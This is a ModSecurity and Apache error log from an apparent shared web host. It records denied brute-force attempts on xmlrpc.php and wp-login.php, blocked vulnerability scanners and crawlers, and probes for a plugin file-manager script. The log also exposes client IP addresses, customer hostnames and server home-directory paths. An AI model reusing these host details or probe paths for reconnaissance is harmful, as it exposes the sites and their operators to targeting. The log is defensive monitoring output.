[Tue May 26 13:54:14.529923 2026] [security2:error] [pid 560287:tid 560444] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYrpmX5s6sDS3wJVck9AAAAJ4"]
[Tue May 26 13:54:15.460205 2026] [security2:error] [pid 555743:tid 555961] [client 186.22.225.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYr8jqAquC0YaxQjDCWgAAAWI"]
[Tue May 26 13:54:15.719336 2026] [security2:error] [pid 560287:tid 560495] [client 129.222.147.134:63675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYr5mX5s6sDS3wJVclDwAAAM4"]
[Tue May 26 13:54:15.727129 2026] [security2:error] [pid 560287:tid 560495] [client 129.222.147.134:63675] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYr5mX5s6sDS3wJVclDwAAAM4"]
[Tue May 26 13:54:16.962482 2026] [security2:error] [pid 555743:tid 555972] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYsMjqAquC0YaxQjDCdQAAAW0"]
[Tue May 26 13:54:17.632482 2026] [autoindex:error] [pid 560287:tid 560481] [client 185.192.71.236:60721] AH01276: Cannot serve directory /home2/svijakqj/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:54:18.631225 2026] [security2:error] [pid 560287:tid 560538] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYspmX5s6sDS3wJVclTwAAAPY"]
[Tue May 26 13:54:18.971977 2026] [security2:error] [pid 560287:tid 560386] [remote 91.211.33.206:50121] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "yourstorybag.com"] [uri "/wp-content/plugins/user-registration-advanced-fields/readme.txt"] [unique_id "ahVYspmX5s6sDS3wJVclYQAA52E"], referer: https://yourstorybag.com/
[Tue May 26 13:54:20.266736 2026] [security2:error] [pid 560287:tid 560523] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYs5mX5s6sDS3wJVcleQAAAOk"]
[Tue May 26 13:54:21.990111 2026] [security2:error] [pid 560287:tid 560504] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYtZmX5s6sDS3wJVclmQAAANY"]
[Tue May 26 13:54:23.335725 2026] [security2:error] [pid 555743:tid 555989] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYtsjqAquC0YaxQjDCxgAAAX4"]
[Tue May 26 13:54:24.007106 2026] [security2:error] [pid 555743:tid 555754] [remote 47.128.47.143:22176] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/ressources/securite-alimentaire-foncier/706-etude-sur-la-contribution-des-exploitations-familiales-a-la-securite-alimentaire-dans-la-region-de-dakar"] [unique_id "ahVYuMjqAquC0YaxQjDCzQABJwo"]
[Tue May 26 13:54:25.253572 2026] [security2:error] [pid 555743:tid 555980] [client 172.226.42.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVYucjqAquC0YaxQjDC2wAAAXU"]
[Tue May 26 13:54:25.321049 2026] [security2:error] [pid 555743:tid 555874] [client 106.192.248.115:55745] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYucjqAquC0YaxQjDC3AAAAQs"]
[Tue May 26 13:54:25.321194 2026] [security2:error] [pid 555743:tid 555874] [client 106.192.248.115:55745] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYucjqAquC0YaxQjDC3AAAAQs"]
[Tue May 26 13:54:25.631913 2026] [security2:error] [pid 560287:tid 560445] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYuZmX5s6sDS3wJVclvwAAAJ8"]
[Tue May 26 13:54:26.158922 2026] [security2:error] [pid 560287:tid 560451] [client 129.222.147.134:9570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYupmX5s6sDS3wJVclxwAAAKU"]
[Tue May 26 13:54:26.159078 2026] [security2:error] [pid 560287:tid 560451] [client 129.222.147.134:9570] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYupmX5s6sDS3wJVclxwAAAKU"]
[Tue May 26 13:54:27.379594 2026] [security2:error] [pid 560287:tid 560474] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYupmX5s6sDS3wJVcl1wAAALo"]
[Tue May 26 13:54:27.840175 2026] [security2:error] [pid 560287:tid 560444] [client 64.31.3.126:45855] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVYu5mX5s6sDS3wJVcl2wAAAJ4"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:54:28.520252 2026] [security2:error] [pid 560287:tid 560511] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYvJmX5s6sDS3wJVcl6AAAAN0"]
[Tue May 26 13:54:29.574268 2026] [security2:error] [pid 560287:tid 560411] [remote 216.73.216.240:29493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVYvZmX5s6sDS3wJVcl-gAA-Xo"]
[Tue May 26 13:54:30.623038 2026] [security2:error] [pid 560287:tid 560440] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYvpmX5s6sDS3wJVcmDQAAAJs"]
[Tue May 26 13:54:32.186141 2026] [security2:error] [pid 560287:tid 560506] [client 106.192.248.115:55946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYwJmX5s6sDS3wJVcmRwAAANg"]
[Tue May 26 13:54:32.196411 2026] [security2:error] [pid 560287:tid 560506] [client 106.192.248.115:55946] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYwJmX5s6sDS3wJVcmRwAAANg"]
[Tue May 26 13:54:32.484770 2026] [security2:error] [pid 555743:tid 555992] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYwMjqAquC0YaxQjDDJwAAAYE"]
[Tue May 26 13:54:34.376074 2026] [autoindex:error] [pid 560287:tid 560498] [client 43.157.147.3:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://juniorwoodies.com
[Tue May 26 13:54:35.921615 2026] [security2:error] [pid 560287:tid 560449] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYw5mX5s6sDS3wJVcmhQAAAKM"]
[Tue May 26 13:54:36.146132 2026] [security2:error] [pid 555743:tid 555911] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYw8jqAquC0YaxQjDDWgAAATA"]
[Tue May 26 13:54:36.189735 2026] [security2:error] [pid 555743:tid 555906] [client 129.222.147.134:13812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYxMjqAquC0YaxQjDDXwAAASs"]
[Tue May 26 13:54:36.194655 2026] [security2:error] [pid 555743:tid 555906] [client 129.222.147.134:13812] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYxMjqAquC0YaxQjDDXwAAASs"]
[Tue May 26 13:54:37.785051 2026] [security2:error] [pid 555743:tid 555991] [client 202.76.187.74:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYxcjqAquC0YaxQjDDZwAAAYA"]
[Tue May 26 13:54:37.961818 2026] [security2:error] [pid 555743:tid 555979] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYxcjqAquC0YaxQjDDawAAAXQ"]
[Tue May 26 13:54:39.228087 2026] [security2:error] [pid 560287:tid 560544] [client 106.192.248.115:56235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYx5mX5s6sDS3wJVcmqgAAAPw"]
[Tue May 26 13:54:39.228210 2026] [security2:error] [pid 560287:tid 560544] [client 106.192.248.115:56235] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYx5mX5s6sDS3wJVcmqgAAAPw"]
[Tue May 26 13:54:39.372435 2026] [security2:error] [pid 555743:tid 555901] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYxsjqAquC0YaxQjDDdAAAASY"]
[Tue May 26 13:54:40.791041 2026] [security2:error] [pid 555743:tid 555942] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYyMjqAquC0YaxQjDDgAAAAU8"]
[Tue May 26 13:54:41.941053 2026] [security2:error] [pid 560287:tid 560339] [remote 74.7.241.58:52656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVYyZmX5s6sDS3wJVcmxAAA6zM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/the-events-calendar/common/src/Common
[Tue May 26 13:54:42.924439 2026] [security2:error] [pid 560287:tid 560493] [client 185.191.171.6:64538] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/5/"] [unique_id "ahVYypmX5s6sDS3wJVcm0AAAAMw"]
[Tue May 26 13:54:42.924612 2026] [security2:error] [pid 560287:tid 560493] [client 185.191.171.6:64538] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/5/"] [unique_id "ahVYypmX5s6sDS3wJVcm0AAAAMw"]
[Tue May 26 13:54:43.006132 2026] [security2:error] [pid 560287:tid 560519] [client 4.204.220.190:2414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.kmmc.co.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVYy5mX5s6sDS3wJVcm0QAAAOU"]
[Tue May 26 13:54:43.006274 2026] [security2:error] [pid 560287:tid 560519] [client 4.204.220.190:2414] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.kmmc.co.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVYy5mX5s6sDS3wJVcm0QAAAOU"]
[Tue May 26 13:54:43.014002 2026] [security2:error] [pid 560287:tid 560533] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYypmX5s6sDS3wJVcmzQAAAPM"]
[Tue May 26 13:54:43.154186 2026] [security2:error] [pid 560287:tid 560472] [client 4.204.220.190:2396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.kmmc.co.in"] [uri "/about.php"] [unique_id "ahVYy5mX5s6sDS3wJVcm0wAAALg"]
[Tue May 26 13:54:43.154340 2026] [security2:error] [pid 560287:tid 560472] [client 4.204.220.190:2396] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.kmmc.co.in"] [uri "/about.php"] [unique_id "ahVYy5mX5s6sDS3wJVcm0wAAALg"]
[Tue May 26 13:54:44.126863 2026] [security2:error] [pid 560287:tid 560550] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYy5mX5s6sDS3wJVcm2gAAAQI"]
[Tue May 26 13:54:44.467130 2026] [security2:error] [pid 555743:tid 555848] [remote 141.95.202.18:46102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVYzMjqAquC0YaxQjDDkgABUGg"]
[Tue May 26 13:54:44.683980 2026] [security2:error] [pid 555743:tid 555911] [client 188.2.155.145:58980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.155.2.188.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lagoslawntennisclub1895.com"] [uri "/xmlrpc.php"] [unique_id "ahVYzMjqAquC0YaxQjDDlwAAATA"]
[Tue May 26 13:54:44.684121 2026] [security2:error] [pid 555743:tid 555911] [client 188.2.155.145:58980] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lagoslawntennisclub1895.com"] [uri "/xmlrpc.php"] [unique_id "ahVYzMjqAquC0YaxQjDDlwAAATA"]
[Tue May 26 13:54:46.161085 2026] [security2:error] [pid 555743:tid 555810] [remote 209.42.18.223:33818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVYzcjqAquC0YaxQjDDqQABREI"]
[Tue May 26 13:54:46.257538 2026] [security2:error] [pid 555743:tid 555979] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYzcjqAquC0YaxQjDDpwAAAXQ"]
[Tue May 26 13:54:46.457472 2026] [security2:error] [pid 555743:tid 555884] [client 129.222.147.134:26222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYzsjqAquC0YaxQjDDtAAAARU"]
[Tue May 26 13:54:46.473647 2026] [security2:error] [pid 555743:tid 555884] [client 129.222.147.134:26222] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYzsjqAquC0YaxQjDDtAAAARU"]
[Tue May 26 13:54:46.599911 2026] [security2:error] [pid 555743:tid 555922] [client 160.119.76.58:57948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYzsjqAquC0YaxQjDDsAAAATs"]
[Tue May 26 13:54:46.822605 2026] [security2:error] [pid 555743:tid 555818] [remote 209.42.19.17:57688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVYzsjqAquC0YaxQjDDuAABJko"]
[Tue May 26 13:54:48.221597 2026] [security2:error] [pid 555743:tid 556000] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYz8jqAquC0YaxQjDDygAAAYk"]
[Tue May 26 13:54:48.271663 2026] [security2:error] [pid 555743:tid 555990] [client 62.60.130.228:55493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVY0MjqAquC0YaxQjDDzwAAAX8"]
[Tue May 26 13:54:48.603563 2026] [security2:error] [pid 555743:tid 555969] [client 62.60.130.228:53453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVY0MjqAquC0YaxQjDD0gAAAWo"], referer: https://www.google.com/
[Tue May 26 13:54:49.293973 2026] [security2:error] [pid 555743:tid 555761] [remote 216.73.216.240:33675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2020b-AkshobhyaHomes.php"] [unique_id "ahVY0cjqAquC0YaxQjDD3AABQRE"]
[Tue May 26 13:54:49.796675 2026] [security2:error] [pid 555743:tid 555807] [remote 216.73.216.240:33675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2022d-Sundar.php"] [unique_id "ahVY0cjqAquC0YaxQjDD4AABYz8"]
[Tue May 26 13:54:49.927523 2026] [security2:error] [pid 560287:tid 560465] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY0ZmX5s6sDS3wJVcnBwAAALI"]
[Tue May 26 13:54:49.941462 2026] [security2:error] [pid 560287:tid 560517] [client 106.192.248.115:56547] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVY0ZmX5s6sDS3wJVcnCgAAAOM"]
[Tue May 26 13:54:49.941620 2026] [security2:error] [pid 560287:tid 560517] [client 106.192.248.115:56547] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVY0ZmX5s6sDS3wJVcnCgAAAOM"]
